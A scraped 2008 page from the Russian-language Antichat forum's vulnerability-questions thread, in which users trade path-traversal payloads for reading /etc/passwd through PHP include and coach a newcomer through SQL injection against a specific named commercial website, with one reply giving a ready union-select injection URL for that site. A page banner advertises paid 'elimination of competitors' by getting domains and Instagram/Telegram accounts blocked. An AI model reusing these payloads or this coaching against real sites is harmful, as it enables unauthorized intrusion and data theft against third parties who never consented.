УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 266 из 1393

266

Опции темы

Поиск в этой теме

Опции просмотра

#2651

18.07.2008, 15:20

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

>> как или какими прогамми можно узнать строение сайта?
Сканеры head заголовков и прочего гомна. А вообще http://madnet.name/tools/madss/

__________________
..

#2652

18.07.2008, 15:20

~~Велемир~~

Banned

Регистрация: 19.06.2006

Сообщений: 1,239

Провел на форуме:
1469161

Репутация: 142

Отправить сообщение для Велемир с помощью ICQ

Каталоги помому ваще фигня -

можно сделать ../../../../../../../../../../etc/passwd или

../etc/passwd

и все равно выдаст тот же фаил, если он есть)

#2653

18.07.2008, 15:21

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

Велемир,

Цитата:

Сообщение от n0ne

зависит от количества заданных каталогов в параметре. Т.е. если изначально запрос

include(/var/www/domain/vasya.ru/$page)

то кол-во .. будет равно 4. Но переборщить с .. нельзя) т.е. если в этом примере ты напишешь 30 .., то хуже не будет выше корня не уйдешь.

#2654

18.07.2008, 15:30

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Цитата:

Сообщение от Велемир

Бред написал. Т.е. по твоему будет одноxуйственно?

include("/usr/blablabla/public_html/".$include_dir."blabla.php");
и
include("/usr/".$include_dir."blabla.php");

И при запросе
mda.php?include_dir=../../../etc/passwd%00
В обоих случаях выведет etc/passwd? Не стоит писать херню

__________________
..

Последний раз редактировалось .Slip; 18.07.2008 в 15:33..

#2655

18.07.2008, 16:44

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

Цитата:

Сообщение от .Slip

include("/usr/blablabla/public_html/".$include_dir."blabla.php");
и
include("/usr/".$include_dir."blabla.php");

И при запросе
mda.php?include_dir=../../../etc/passwd%00
В обоих случаях выведет etc/passwd?

Если не ошибаюсь, то в твоем примере в обоих случаях выведет /etc/passwd ))

#2656

18.07.2008, 23:01

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Отправить сообщение для Cennarios с помощью ICQ

Добрый всем. Немогли бы вы подсказать по sql inj. На сайте www.viagra.by в поиске походу sql inj. При запросе '#.......
Отвечает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Как правильно далее выстроить запрос? '# union select null/* вроде не работает. Или просто не выводит ничего? Заранее спасибо за ответ.

#2657

18.07.2008, 23:12

sabe

Постоянный

Регистрация: 16.03.2007

Сообщений: 380

Провел на форуме:
1404552

Репутация: 568

Отправить сообщение для sabe с помощью ICQ

Отправить сообщение для sabe с помощью AIM

Отправить сообщение для sabe с помощью Yahoo

причем тут # это тоже самое что и --
подставляй чтот тип.. '+union+select+1,2/*

а вообще намного удобние производить иньекцию здесь:

Цитата:

http://www.viagra.by/index.php?action=-1'+union+select+1,2,unhex(hex(version())),4,5/*

Последний раз редактировалось sabe; 18.07.2008 в 23:21..

#2658

18.07.2008, 23:23

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Ок, thx

#2659

18.07.2008, 23:40

Cennarios

Участник форума

Регистрация: 13.07.2008

Сообщений: 101

Провел на форуме:
346497

Репутация: 303

Не волучается. =( С поиска передаются данные через POST, через GET не берет .

Выдает только:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1/*%' OR artikul LIKE '%'union+select+1/*%' OR description LIKE '%'' at line 1

Укажите плз нубу на его ошубку=)

#2660

18.07.2008, 23:55

~~~!DoK_tOR!~~~

Banned

Регистрация: 10.11.2006

Сообщений: 829

Провел на форуме:
2634544

Репутация: 1559

Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ

выше запрос те же дали он работает )

Страница 266 из 1393

266

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход